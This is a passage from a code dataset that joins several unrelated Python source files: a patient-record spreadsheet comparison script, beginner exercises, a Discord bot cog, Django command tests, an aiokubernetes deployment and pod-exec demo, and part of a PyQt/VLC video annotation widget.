\n rhino_report['first_name'] = rhino_report['first_name'].str.strip()\n rhino_report['first_name'] = rhino_report['first_name'].str.capitalize()\n merged_data['GIVEN_NAME'] = merged_data['GIVEN_NAME'].str.strip()\n merged_data['GIVEN_NAME'] = merged_data['GIVEN_NAME'].str.capitalize()\n rhino_report['medicare_number'] = rhino_report['medicare_number'].str.replace(' ', '')\n merged_data['MEDICARE_NUMBER'] = merged_data['MEDICARE_NUMBER'].str.slice(start = 0, stop = 10)\n #merged_data['MEDICARE_NUMBER'] = merged_data['MEDICARE_NUMBER'].str.replace(' ', '')\n #merged_data['DATE_OF_BIRTH'] = merged_data['DATE_OF_BIRTH'].str.replace(' ', '')\n #rhino_report['date_of_birth'] = rhino_report['date_of_birth'].str.replace(' ', '')\n rhino_report['encounter_date'] = pd.to_datetime(rhino_report['encounter_date'],errors='coerce', format='%d/%m/%Y')\n merged_data['ServDate'] = pd.to_datetime(merged_data['ServDate'],errors='coerce', format='%d/%m/%Y')\n merged_data['DATE_OF_BIRTH'] = pd.to_datetime(merged_data['DATE_OF_BIRTH'],errors='coerce', format='%d/%m/%Y')\n #merged_data['ServDate'] = merged_data['ServDate'].dt.strftime('%d/%m/%Y')\n #rhino_report['encounter_date'] = rhino_report['encounter_date'].dt.strftime('%d/%m/%Y')\n #rhino_report['encounter_date'] = rhino_report['encounter_date'].str.replace(' ', '')\n #merged_data['ServDate'] = merged_data['ServDate'].str.replace(' ', '')\n #rhino_report['date_of_birth'] = rhino_report['date_of_birth'].str.slice(start = 0, stop = 10)\n rhino_report['date_of_birth'] = pd.to_datetime(rhino_report['date_of_birth'], errors='coerce')\n rhino_report['date_of_birth'] = rhino_report['date_of_birth'].dt.date\n merged_data['DATE_OF_BIRTH']= merged_data['DATE_OF_BIRTH'].dt.date\n\n start_date = datetime.strptime(start_date, '%d/%m/%Y')\n end_date = datetime.strptime(end_date, '%d/%m/%Y')\n\n rhino_report_date_filter = rhino_report[(rhino_report.encounter_date >= start_date) & (rhino_report.encounter_date <= end_date)]\n merged_data_date_filter = merged_data[(merged_data.ServDate >= start_date) & (merged_data.ServDate <= end_date)]\n\n merged_data_date_filter = merged_data_date_filter.rename(columns = {'ServDate':'encounter_date', 'DATE_OF_BIRTH':'date_of_birth','MEDICARE_NUMBER': 'medicare_number', 'FAMILY_NAME': 'last_name', 'GIVEN_NAME': 'first_name', 'HOME_ADDRESS_LINE_1': 'address_line1', 'HOME_SUBURB_TOWN':'suburb', 'HOME_POSTCODE': 'postcode', 'AGE': 'age_at_presentation'})\n\n rhino_report_date_filter = rhino_report_date_filter.drop(columns=['medicare_number'])\n\n indicator_values = {\"left_only\": \"In Rhino\", \"right_only\": \"In REDRC\", \"both\": \"In Both reports\"}\n new_df = rhino_report_date_filter.merge(merged_data_date_filter, on=['encounter_date','date_of_birth', 'first_name'] ,how='outer', indicator = True)\n new_df['_merge'] = new_df['_merge'].map(indicator_values)\n new_df.rename(columns= {'_merge':'Spreadsheet Location'}, inplace = True)\n #new_df = new_df.drop_duplicates(['encounter_date','date_of_birth','medicare_number'], keep='first')\n\n new_df = new_df.to_excel(f'{output_location}/comparison_output.xlsx', header = True)\n #rhino_report.to_csv('rhino.csv' , header = True)\n #merged_data.to_csv('test.csv', header=True)\n except:\n return False\n \n\n\n\n \n\n\n\n\n\n\n","repo_name":"rhys-rushton/patient-records-compare","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27182234804","text":"#1\ndef 
s1(num):\n return int(num) ** 2\nans = s1(\"10\")\n\n#2\ndef s2(num):\n print(str(num))\nans = s2(\"hello\")\n\n\n#3\ndef add(a,b,c,x=2, y=2):\n \"\"\"\n return 3 + 5 + 3.\n hissu 3\n opusyon 2\n : param x: int.\n : param y: int.\n : param z: int.\n \"\"\"\n return x + y\nans3 = add(3,5,2)\nprint(ans3)\n\n#4\ndef two(start):\n \"\"\"\n ans4_1 = integer / 2.\n : param ans4_1: int.\n : param integer: int.\n \"\"\"\n ans4_1 = start\n ans4_1 /= 2\n return ans4_1\ndef four(r):\n \"\"\"\n return = r * 4.\n \"\"\"\n \n r *= 4\n return r\n\nresult1 = two(40)\nprint(result1)\n\nresult2 = four(20)\nprint(result2)\n\nans4 = two(6)\nresult3 = four(ans4)\nprint(result3)\n\n\n#5\ndef change_float(num):\n \"\"\"\n try-except.\n change to float.\n \"\"\"\n try:\n A = float(num)\n return A\n except(ValueError):\n print(\"invalid input\")\n\n\n\n\nresult = change_float(\"Hello\")\nprint(result)\n\n\n","repo_name":"eeeeriri/challenge19","sub_path":"study4.py","file_name":"study4.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41415998674","text":"'''\nStarted to try to make the bot play music but I got a little tired late in the night\nI might try to finish it up later but my main concern right now is the scraper cog\n'''\n\nimport discord\nimport nacl\nimport asyncio\nfrom discord.ext import commands\n\nbot = commands.Bot(command_prefix='>')\n\nsongs = asyncio.Queue()\nplay_next_song = asyncio.Event()\n\n\nclass AudioBot(commands.Cog):\n playing = ''\n queue = []\n\n def __init__(self, bot):\n self.bot = bot\n\n @bot.command()\n async def join(self, ctx):\n channel = ctx.author.voice.channel\n await channel.connect()\n \n @bot.command()\n async def leave(self, ctx):\n await ctx.voice_client.disconnect()\n\n @bot.command(pass_context=True)\n async def play(self, ctx, url):\n try:\n channel = ctx.author.voice.channel\n await channel.connect()\n except:\n await ctx.send('Please join a channel first')\n\ndef setup(bot):\n bot.add_cog(AudioBot(bot))\n","repo_name":"lemmaandrew/Python","sub_path":"DiscordBot/cogs/AudioBot.py","file_name":"AudioBot.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31066656675","text":"import random\nfrom datetime import date\nfrom unittest.mock import patch\n\nimport vcr\nfrom click.testing import CliRunner\nfrom django.core.management import call_command\nfrom django.test import TestCase\n\nfrom core.management.commands.add_organizer import command as add_organizer\nfrom core.management.commands.copy_event import command as copy_event\nfrom core.management.commands.new_event import command as new_event\nfrom core.management.commands.prepare_dispatch import \\\n command as prepare_dispatch\nfrom core.models import Event\n\n\nclass CommandsTestCase(TestCase):\n fixtures = ['core_views_testdata.json', 'groups_testdata.json', 'pictures_testdata.json']\n\n def setUp(self):\n self.event_1 = Event.objects.get(pk=1) # In the future\n self.runner = CliRunner(echo_stdin=True)\n today = date.today()\n self.start_date = today.toordinal()\n self.end_date = today.replace(year=today.year+10).toordinal()\n\n def _get_random_day(self):\n return date.fromordinal(random.randint(self.start_date, self.end_date))\n\n @vcr.use_cassette('core/tests/vcr/update_coordinates.yaml')\n def test_update_coordinates(self):\n event_2 = Event.objects.get(pk=2)\n latlng = event_2.latlng\n event_2.latlng = 
None\n event_2.save()\n\n event_2 = Event.objects.get(pk=2)\n self.assertEqual(event_2.latlng, None)\n\n call_command('update_coordinates')\n\n event_2 = Event.objects.get(pk=2)\n self.assertEqual(event_2.latlng, latlng)\n\n @patch('core.models.user_invite')\n def test_add_organizer(self, mock_user_invite):\n event = Event.objects.get(pk=1)\n assert event.team.count() == 2\n\n command_input = (\n \"1\\n\"\n \"Jan Kowalski\\n\"\n \"jan@kowalski.example.org\\n\"\n \"N\\n\"\n )\n\n self.runner.invoke(\n add_organizer,\n input=command_input\n )\n event = Event.objects.get(pk=1)\n assert event.team.count() == 3\n\n @vcr.use_cassette('core/tests/vcr/new_event_with_one_organizer.yaml')\n def test_new_event_with_one_organizer(self):\n assert Event.objects.count() == 4\n\n random_day = self._get_random_day()\n\n command_input = (\n \"Oz\\n\"\n \"Neverland\\n\"\n \"{random_day}\\n\"\n \"oz\\n\"\n \"oz\\n\"\n \"Jan Kowalski\\n\"\n \"jan@kowalski.example.org\\n\"\n \"N\\n\"\n ).format(random_day=random_day.strftime(\"%d/%m/%Y\"))\n\n self.runner.invoke(\n new_event,\n input=command_input\n )\n assert Event.objects.count() == 5\n event = Event.objects.order_by('pk').last()\n assert event.team.count() == 1\n\n @vcr.use_cassette('core/tests/vcr/new_event_with_two_organizers.yaml')\n def test_new_event_with_two_organizers(self):\n assert Event.objects.count() == 4\n\n random_day = self._get_random_day()\n\n command_input = (\n \"Oz\\n\"\n \"Neverland\\n\"\n \"{random_day}\\n\"\n \"oz\\n\"\n \"oz\\n\"\n \"Jan Kowalski\\n\"\n \"jan@kowalski.example.org\\n\"\n \"Y\\n\"\n \"Eleanor Organizer\\n\"\n \"ealenor@organizer.example.org\\n\"\n \"N\"\n ).format(random_day=random_day.strftime(\"%d/%m/%Y\"))\n\n self.runner.invoke(\n new_event,\n input=command_input\n )\n assert Event.objects.count() == 5\n event = Event.objects.order_by('pk').last()\n assert event.team.count() == 2\n\n @vcr.use_cassette('core/tests/vcr/new_event_short.yaml')\n def test_new_event_short(self):\n assert Event.objects.count() == 4\n\n random_day = self._get_random_day()\n\n command_input = (\n \"Oz\\n\"\n \"Neverland\\n\"\n \"{random_day}\\n\"\n \"oz\\n\"\n \"oz\\n\"\n \"Jan Kowalski\\n\"\n \"jan@kowalski.example.org\\n\"\n \"N\\n\"\n ).format(random_day=random_day.strftime(\"%d/%m/%Y\"))\n\n result = self.runner.invoke(\n new_event,\n args=[\"--short\"],\n input=command_input\n )\n assert Event.objects.count() == 5\n short_email_body = \"\"\"Event e-mail is: oz@djangogirls.org\nEvent website address is: https://djangogirls.org/oz\"\"\"\n assert short_email_body in result.output\n\n def test_copy_event(self):\n assert Event.objects.count() == 4\n\n random_day = self._get_random_day()\n new_event_number = 2\n command_input = (\n \"2\\n\"\n \"{new_event_number}\\n\"\n \"{random_day}\\n\"\n ).format(random_day=random_day.strftime(\"%d/%m/%Y\"),\n new_event_number=new_event_number)\n\n self.runner.invoke(\n copy_event,\n input=command_input\n )\n old_event = Event.objects.get(pk=2)\n name = old_event.name.split('#')[0].strip()\n new_name = \"{} #{}\".format(name, new_event_number)\n try:\n new_event = Event.objects.get(name=new_name)\n except Event.DoesNotExist:\n self.fail(\"Event not copied properly!\")\n\n assert new_event.city == old_event.city\n assert new_event.team.count() == old_event.team.count()\n\n assert new_event.page_main_color == old_event.page_main_color\n assert new_event.content.count() == old_event.content.count()\n assert new_event.menu.count() == old_event.menu.count()\n\n def test_prepare_dispatch_with_data(self):\n 
today = date.today()\n start_date = today.replace(year=today.year-20).toordinal()\n end_date = today.toordinal()\n random_past_day = date.fromordinal(\n random.randint(start_date, end_date))\n\n command_input = (\n \"{random_past_day}\\n\"\n ).format(random_past_day=random_past_day.strftime(\"%Y-%m-%d\"))\n\n result = self.runner.invoke(\n prepare_dispatch,\n input=command_input\n )\n assert result.exception is None\n assert b'PREVIOUS EVENTS' in result.output_bytes\n\n def test_prepare_dispatch_without_data(self):\n start_date = date.today().toordinal()\n random_past_day = date.fromordinal(\n random.randint(start_date, start_date))\n\n command_input = (\n \"{random_past_day}\\n\"\n ).format(random_past_day=random_past_day.strftime(\"%Y-%m-%d\"))\n\n result = self.runner.invoke(\n prepare_dispatch,\n input=command_input\n )\n assert result.exception is None\n assert b'PREVIOUS EVENTS' in result.output_bytes\n\n def test_prepare_dispatch_wrong_date(self):\n start_date = date.today().toordinal()\n random_past_day = date.fromordinal(\n random.randint(start_date, start_date))\n\n command_input = (\n \"{random_past_day}\\n\"\n ).format(random_past_day=random_past_day.strftime(\"%Y/%m/%d\"))\n\n result = self.runner.invoke(\n prepare_dispatch,\n input=command_input\n )\n assert isinstance(result.exception, ValueError)\n assert b'PREVIOUS EVENTS' not in result.output_bytes\n","repo_name":"patjouk/djangogirls","sub_path":"core/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":7160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"50702954676","text":"#!/usr/bin/env python3\n\ndef dubbelen(l_namen):\n l_namen = l_namen[:]\n l_dubbelen = []\n for idx in range(1,len(l_namen)):\n naam = l_namen[idx]\n if idx > l_namen.index(naam):\n l_dubbelen.append(idx)\n return tuple(l_dubbelen)\n\ndef dubbelen2(l_namen):\n l_namen = l_namen[:]\n l_gevonden = []\n l_dubbelen = []\n for i, naam in enumerate(l_namen):\n if naam in l_gevonden:\n l_dubbelen.append(i)\n else:\n l_gevonden.append(naam)\n return tuple(l_dubbelen)\n\nnamen = [ 'jan', 'piet', 'henk', 'els', 'piet',\n 'els', 'john', 'els', 'jan', 'els', 'henk']\n\n# namen.sort()\n\nprint(\"De invoerlijst wordt:\", namen)\n\ndublist = dubbelen(namen)\n\nprint(dublist)\n\ndublist = dubbelen2(namen)\n\nprint(dublist)\n\n\n","repo_name":"markodraisma/python_3_daags_uitwerkingen","sub_path":"opgave13.py","file_name":"opgave13.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41282125351","text":"\"\"\"Test all components of `aiokubernetes`.\n\nThis script will create two async tasks. One will watch the namespaces and the\nother will create a login pod deployment, log into that Pod, issue commands\nwith and without an interactive Websocket connection and then delete the pod.\n\nNOTE: This is both a demo and an integration test. 
See the other examples for\nmore concise feature demonstrations.\n\"\"\"\nimport asyncio\nimport os\n\nimport aiohttp\nimport yaml\n\nimport aiokubernetes as k8s\n\n\nasync def watch_resource(request):\n async for event in k8s.watch.AioHttpClientWatch(request):\n print(f\"{event.name} {event.obj.kind} {event.obj.metadata.name}\")\n\n\nasync def create_deployment(proxy, client):\n img_alpine_34, img_alpine_35 = 'alpine:3.4', 'alpine:3.5'\n time_between_steps = 3\n\n # Load the manifest with a valid Python/Alpine container deployment.\n base_path = os.path.dirname(os.path.abspath(__file__))\n fname = os.path.join(base_path, 'manifests/create-deployment.yaml')\n body = yaml.safe_load(open(fname, 'r'))\n name, namespace = body['metadata']['name'], body['metadata']['namespace']\n img_orig = body['spec']['template']['spec']['containers'][0]['image']\n del fname\n\n # Assign a specific container image (we will later replace that container\n # and re-deploy to illustrate the workflow).\n body['spec']['template']['spec']['containers'][0]['image'] = img_alpine_34\n img_new = body['spec']['template']['spec']['containers'][0]['image']\n print(f'Replaced <{img_orig}> with <{img_new}>')\n\n # ----------------------------------------------------------------------\n # Create the namespace .\n # ----------------------------------------------------------------------\n manifest = {\n 'apiVersion': 'v1',\n 'kind': 'Namespace',\n 'metadata': {'name': namespace},\n }\n cargs = k8s.api.CoreV1Api(proxy).create_namespace(body=manifest)\n ret = await client.request(**cargs)\n if ret.status == 201:\n print(f'Namespace <{namespace}> created')\n elif ret.status == 409:\n print(f'Namespace <{namespace}> already exists')\n else:\n print(f'Error {ret.status}')\n print(await ret.text())\n\n # -------------------------------------------------------------------------\n # Create Deployment\n # -------------------------------------------------------------------------\n k8s_v1beta = k8s.ExtensionsV1beta1Api(proxy)\n print(f'Creating deployment {name}...')\n cargs = k8s_v1beta.create_namespaced_deployment(body=body, namespace=namespace)\n http = await client.request(**cargs)\n print(' ->', http.method, http.status, http.url)\n del cargs, http\n\n # -------------------------------------------------------------------------\n # Patch Deployment\n # -------------------------------------------------------------------------\n # print(f'Patching deployment {name}...')\n # fname = os.path.join(base_path, 'manifests/patch-deployment.yaml')\n # body_patch = yaml.safe_load(open(fname, 'r'))\n # resp = await k8s_v1beta.patch_namespaced_deployment(\n # name=name, namespace=namespace, body=body_patch)\n # await asyncio.sleep(time_between_steps)\n\n # -------------------------------------------------------------------------\n # Search For The Login Pod\n # -------------------------------------------------------------------------\n print(f'\\nConnecting to a login pod: ', end='', flush=True)\n\n # Try several times to connect to the pod. 
We have to do this because we\n # only just created the pod and it takes a few seconds until it is ready.\n for i in range(300):\n # Get a list of all pods.\n cargs = k8s.CoreV1Api(proxy).list_namespaced_pod(namespace)\n http = await client.request(**cargs)\n pods = k8s.swagger.unpack(await http.read())\n\n # Find all running pods whose name starts with 'login'.\n pods = [_ for _ in pods.items if _.metadata.name.lower().startswith('login')]\n pods = [_ for _ in pods if _.status.phase.lower() == 'running']\n\n # Briefly wait before looking for a suitable pod, unless we already found one.\n if http.status != 200 or len(pods) == 0:\n print('.', end='', flush=True)\n await asyncio.sleep(0.1)\n continue\n print('\\n ->', http.method, http.status, http.url, '\\n')\n del cargs, http\n\n # Could be a stale deployment - not a problem, but let user know.\n if len(pods) > 1:\n print('Found multiple login pods')\n\n # Extract the pod name that we will connect to.\n login_pod_name = pods[0].metadata.name\n print(f'Connecting to Pod <{login_pod_name}>')\n break\n else:\n login_pod_name = None\n print('No login has entered \"running\" state yet: skip connection test')\n\n # -------------------------------------------------------------------------\n # Execute Command in Login Pod via GET request.\n # -------------------------------------------------------------------------\n if login_pod_name is not None:\n print('\\nNon-interactive Websocket')\n # Connect to the pod and print something to the terminal.\n cargs = k8s.CoreV1Api(api_client=proxy).connect_get_namespaced_pod_exec(\n login_pod_name, namespace,\n command=['/bin/sh', '-c', 'echo Hello World'],\n stderr=True, stdin=True, stdout=True, tty=True\n )\n\n # Tell K8s that this is a Websocket, not a GET.\n cargs['headers']['sec-websocket-protocol'] = 'v4.channel.k8s.io'\n url = k8s.api_client.get_websocket_url(cargs['url'])\n\n # Connect the Websocket and consume the Websocket until Kubernetes closes it.\n ws_session = client.ws_connect(url, headers=cargs['headers'])\n async with ws_session as ws:\n async for msg in ws:\n chan, msg = msg.data[0], msg.data[1:]\n print(f' Websocket Channel {chan}: {msg}')\n del cargs, url, ws_session\n\n # -------------------------------------------------------------------------\n # Use interactive Websocket to execute commands in Login Pod\n # -------------------------------------------------------------------------\n if login_pod_name is not None:\n print('\\nInteractive Websocket')\n\n # Connect to the pod and issue a single command to spawn a shell. We\n # will then use a websocket to send commands to that shell.\n wargs = k8s.CoreV1Api(api_client=proxy).connect_get_namespaced_pod_exec(\n login_pod_name, namespace,\n command=['/bin/sh'],\n stderr=True, stdin=True, stdout=True, tty=True\n )\n\n # Tell K8s that this is a Websocket, not a GET.\n wargs['headers']['sec-websocket-protocol'] = 'v4.channel.k8s.io'\n url = k8s.api_client.get_websocket_url(wargs['url'])\n\n # Connect the Websocket and consume the Websocket until Kubernetes closes it.\n ws_session = client.ws_connect(url, headers=wargs['headers'])\n async with ws_session as ws:\n # The \\x00 prefix denotes `stdin`, which is where we need to send\n # the command to. 
The rest is just a sequence of two shell commands.\n await ws.send_bytes(b'\\x00' + b'ls --color=never /\\nexit\\n')\n\n # Read until we receive something on channel 3 to tell us that this was it.\n async for msg in ws:\n chan, msg = msg.data[0], msg.data[1:]\n print(f' Websocket Channel {chan}: {msg}')\n\n # -------------------------------------------------------------------------\n # Replace Deployment\n # -------------------------------------------------------------------------\n img_orig = body['spec']['template']['spec']['containers'][0]['image']\n body['spec']['template']['spec']['containers'][0]['image'] = img_alpine_35\n img_new = body['spec']['template']['spec']['containers'][0]['image']\n print(f'Replaced <{img_orig}> with <{img_new}>')\n\n print(f'\\nReplacing deployment {name}...')\n cargs = k8s_v1beta.replace_namespaced_deployment(name, namespace, body=body)\n http = await client.request(**cargs)\n assert isinstance(http, aiohttp.client_reqrep.ClientResponse)\n print(' ->', http.method, http.status, http.url)\n del cargs, http\n\n # -------------------------------------------------------------------------\n # Delete Deployment\n # -------------------------------------------------------------------------\n await asyncio.sleep(time_between_steps)\n print(f'\\nDeleting deployment {name}...')\n del_opts = k8s.V1DeleteOptions(\n api_version='v1', kind='DeleteOptions', grace_period_seconds=0,\n propagation_policy='Foreground',\n )\n cargs = k8s_v1beta.delete_namespaced_deployment(name, namespace, body=del_opts)\n http = await client.request(**cargs)\n assert isinstance(http, aiohttp.client_reqrep.ClientResponse)\n print(' ->', http.method, http.status, http.url)\n del cargs, http\n\n print('------------ End of Demo ------------')\n\n\nasync def setup():\n config = k8s.utils.load_config(warn=False)\n client = k8s.clients.get_aiohttp(config)\n proxy = k8s.api_proxy.Proxy(config)\n\n # Specify and dispatch the tasks.\n cargs = k8s.CoreV1Api(proxy).list_namespace(watch=True, timeout_seconds=1)\n tasks = [\n create_deployment(proxy, client),\n watch_resource(client.request(**cargs)),\n ]\n await asyncio.gather(*tasks)\n\n print('\\nShutting down')\n await client.close()\n\n\ndef main():\n # Setup event loop and setup the program.\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.ensure_future(setup()))\n loop.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"olitheolix/aiokubernetes","sub_path":"examples/all_in_one.py","file_name":"all_in_one.py","file_ext":"py","file_size_in_byte":9885,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"16"} +{"seq_id":"35668595787","text":"import pytest\n\nfrom slsdet import Mythen3GainCapsWrapper\nfrom slsdet.enums import M3_GainCaps #this is the c++ enum\n\n\ndef test_comapre_with_int():\n c = Mythen3GainCapsWrapper(128) #C10pre\n assert c == 128\n assert c != 5\n assert c != 1280\n\ndef test_compare_with_other():\n a = Mythen3GainCapsWrapper(128)\n b = Mythen3GainCapsWrapper(1<<10)\n c = Mythen3GainCapsWrapper(128)\n assert a!=b\n assert (a==b) == False\n assert a==c\n\ndef test_can_be_default_constructed():\n c = Mythen3GainCapsWrapper() \n assert c == 0\n\n","repo_name":"slsdetectorgroup/slsDetectorPackage","sub_path":"python/tests/test_m3gaincaps.py","file_name":"test_m3gaincaps.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"} +{"seq_id":"6157162714","text":"import re\nimport 
sys, getopt\n\ndef longtfm2sec(timestr):\n t = timestr.split(\":\")\n sec = int(t[0])*3600 + int(t[1])*60 + float(t[2].replace(',','.'))\n return (sec)\n\ndef sec2longtfm(sec):\n dm = divmod(sec,3600) \n jam = str(round(dm[0])).zfill(2)\n dm = divmod(dm[1],60) \n mnt = str(round(dm[0])).zfill(2)\n dtk = str('%.3f' % dm[1]).zfill(6).replace('.',',')\n return (\"%s:%s:%s\" % (jam, mnt, dtk))\n\ndef main(srtfile, shift):\n \n # namafile = 'Outlander S01E09.srt'\n try:\n f= open(srtfile,\"r\")\n if f.mode == \"r\":\n fout= open(srtfile.replace('.srt','_new.srt'), \"w\")\n f1 = f.readlines()\n reg = re.compile('\\d\\d\\:\\d\\d:\\d\\d\\,\\d\\d\\d --> \\d\\d:\\d\\d:\\d\\d,\\d\\d\\d')\n for i in f1:\n m = reg.match(i)\n if m:\n t = i.split(\" --> \")\n t1 = longtfm2sec(t[0]) + shift\n t2 = longtfm2sec(t[1]) + shift\n fout.write(sec2longtfm(t1) + ' --> ' + sec2longtfm(t2) + '\\n')\n else:\n fout.write(i)\n fout.close()\n f.close()\n print ('Output file: ' + srtfile.replace('.srt','_new.srt'))\n except FileNotFoundError:\n print('Error read file',srtfile)\n\nif __name__== \"__main__\":\n if len(sys.argv) == 1:\n print ('Command syntax:')\n print ('run.py -h -i -s ' )\n sys.exit(2)\n try:\n opts, args = getopt.getopt(sys.argv[1:],\"hi:s:\")\n except getopt.GetoptError:\n print ('run.py -i -s ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print ('run.py -i -s ')\n sys.exit()\n if opt == '-i':\n ifile = (arg)\n if opt == '-s':\n shift = int(arg)\n \n main(ifile, shift)\n\n","repo_name":"miidev/srtshifter","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27412321454","text":"import threading\nimport time\nimport psutil\nfrom io import BytesIO\nimport cv2\nimport subprocess\nimport numpy as np\nfrom boto.s3.connection import S3Connection\nfrom boto.exception import S3ResponseError\nfrom logging import getLogger\nfrom global_finprint import Extent\nfrom .play_state import PlayState\nfrom .highlighter import Highlighter\nfrom .context_menu import ContextMenu, EventDialog\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom threading import Thread\nfrom threading import Event as PyEvent\nfrom tempfile import gettempdir\nfrom .vlc import *\nfrom .vlc_utils import *\nfrom win32api import GetSystemMetrics\n\n\nPROGRESS_UPDATE_INTERVAL = 30000\nVIDEO_WIDTH = 800 # make this more adjustable\nVIDEO_HEIGHT = 450\nMIN_VIDEO_WIDTH = 544 # make this more adjustable\nMIN_VIDEO_HEIGHT = 306\nDEFAULT_ASPECT_RATIO = 16.0 / 9.0\nAWS_BUCKET_NAME = 'finprint-annotator-screen-captures'\nSCREEN_CAPTURE_QUALITY = 25 # 0 to 100 (inclusive); lower is small file, higher is better quality\nTEMP_SNAPSHOT_DIR = 'finprint-snapshot'\n\nSEEK_CLOCK_FACTOR = 30\nSEEK_FRAME_JUMP = 60\n\nVIDEOFRAME_INDEX = 0\nANNOTATION_INDEX = 1\n\ncreds = open('./credentials.csv').readlines()[1].split(',')\nAWS_ACCESS_KEY_ID = creds[1].strip()\nAWS_SECRET_ACCESS_KEY = creds[2].strip()\n\n\nclass RepeatingTimer(QObject):\n timerElapsed = pyqtSignal()\n\n def __init__(self, interval):\n super(RepeatingTimer, self).__init__()\n self.interval = interval\n self.active = False\n self.shutdown_event = PyEvent()\n self.thread = None\n\n def wrapper_function(self):\n self.active = True\n self.shutdown_event.clear()\n while self.active:\n if self.shutdown_event.wait(timeout=self.interval):\n self.active = False\n else:\n self.timerElapsed.emit()\n\n def start(self):\n self.thread = Thread(group=None, 
target=self.wrapper_function, daemon=True)\n self.thread.start()\n\n def cancel(self):\n self.shutdown_event.set()\n\nclass TimerVO :\n def __init__(self, dur):\n ''' Duration of current timer in seconds '''\n self.timer_duration_ms = dur\n\n\nclass AnnotationImage(QWidget):\n def __init__(self):\n QWidget.__init__(self)\n self.highlighter = Highlighter()\n self._pressed = False\n self._dragging = False\n self.curr_image = None\n self.can_update = True\n self.initUI()\n\n def initUI(self):\n self.show()\n\n def clear(self):\n self.curr_image = None\n self.clearExtent()\n\n def clearExtent(self):\n self.highlighter.clear()\n\n def set_rect(self, rect):\n self.highlighter.set_rect(rect)\n self.repaint()\n\n def get_rect(self):\n return self.highlighter.get_rect()\n\n def mousePressEvent(self, event):\n if self.can_update:\n self._pressed = True\n self.highlighter.start_rect(event.pos())\n self.update()\n\n def mouseMoveEvent(self, event):\n if self.can_update:\n if self._pressed: # If mouse was earlier pressed, then this mouse move is actually a DRAG\n self._dragging = True\n x, y = event.pos().x(), event.pos().y()\n clamped_pos = QPoint(min(x, self.width()), min(y, self.height()))\n self.highlighter.set_rect(clamped_pos)\n self.update()\n\n def mouseReleaseEvent(self, event):\n if self._dragging:\n self._dragging = False\n self.update()\n self.parent().context_menu()\n\n def paintEvent(self, e):\n # This should only be called when\n if self.curr_image is not None:\n painter = QPainter()\n painter.begin(self)\n painter.drawImage(QPoint(0, 0), self.curr_image)\n painter.setPen(QPen(QBrush(Qt.green), 1, Qt.SolidLine))\n painter.drawRect(self.highlighter.get_rect())\n painter.end()\n\n\nclass VlcVideoWidget(QStackedWidget):\n playStateChanged = pyqtSignal(PlayState)\n progressUpdate = pyqtSignal(int)\n playbackSpeedChanged = pyqtSignal(float)\n\n def __init__(self, parent=None, onPositionChange=None, fullscreen=False):\n QWidget.__init__(self, parent)\n self._capture = None\n self._paused = True\n self._play_state = PlayState.NotReady\n self._file_name = None\n self._fullscreen = fullscreen\n self._dragging = False\n self._highlighter = Highlighter()\n self._onPositionChange = onPositionChange\n self._extent_rect = None\n self._duration = 0\n # XXX hacks for image filtering\n self.current_snapshot = None\n self.saturation = 0\n self.brightness = 0\n self.contrast = False\n self.retry_count = 0\n\n # We will pass a window handle to libvlc, which\n # will be responsible for the actual rendering of the video\n if sys.platform == \"darwin\": # for MacOS\n self.videoframe = QMacCocoaViewContainer(0)\n else:\n self.videoframe = QFrame()\n\n # add the videoframe\n self.addWidget(self.videoframe)\n\n # XXX Fixme - this is a hack\n if not self._fullscreen:\n if GetSystemMetrics(1) > 800 :\n self.setMinimumSize(VIDEO_WIDTH, VIDEO_HEIGHT)\n self.setMaximumSize(VIDEO_WIDTH, VIDEO_HEIGHT)\n else :\n self.setMinimumSize(MIN_VIDEO_WIDTH, MIN_VIDEO_HEIGHT)\n self.setMaximumSize(MIN_VIDEO_WIDTH, MIN_VIDEO_HEIGHT)\n\n # add the annotation image\n self.annotationImage = AnnotationImage()\n self.addWidget(self.annotationImage)\n\n # set videoframe as default visibile widget\n self.setCurrentIndex(VIDEOFRAME_INDEX)\n\n # XXX todo - get aspect ratio from vlc when played\n self._aspect_ratio = DEFAULT_ASPECT_RATIO\n\n # temporary storage for vlc snapshots\n self.temp_snapshot_dir = os.path.join(gettempdir(), TEMP_SNAPSHOT_DIR)\n\n if not os.path.exists(self.temp_snapshot_dir):\n 
os.makedirs(self.temp_snapshot_dir)\n\n # bind instance to load libvlc. This is where we pass parameters for\n # startup, like buffering and vlc specific debug and logging params\n startup_args = get_vlc_params()\n self.instance = Instance(startup_args)\n # create a vlc media player from loaded library\n self.mediaplayer = self.instance.media_player_new()\n\n # This keeps track of how far the annotator has gotten in the video\n self._last_progress = 0\n\n self._timer_flag = False\n self.timer_time = time.perf_counter()\n self._timer = RepeatingTimer(0.25)\n self._timer.timerElapsed.connect(self.on_timer)\n # Initialize timer value object with 0 ms\n self.timer_vo = TimerVO(0)\n\n self._context_menu = None\n self._current_set = None\n\n # current observation rect to display\n self._observation_rect = None\n\n self.setStyleSheet('QMenu { background-color: white; }')\n\n # XXX Todo - move ui components into a initUI\n self.initUI()\n\n def initUI(self):\n pass\n\n def _print_sys_info(self):\n l = getLogger('finprint')\n p = psutil.Process()\n l.debug('System CPU %: {}'.format(psutil.cpu_percent()))\n l.debug('System Memory: {}'.format(psutil.virtual_memory()))\n 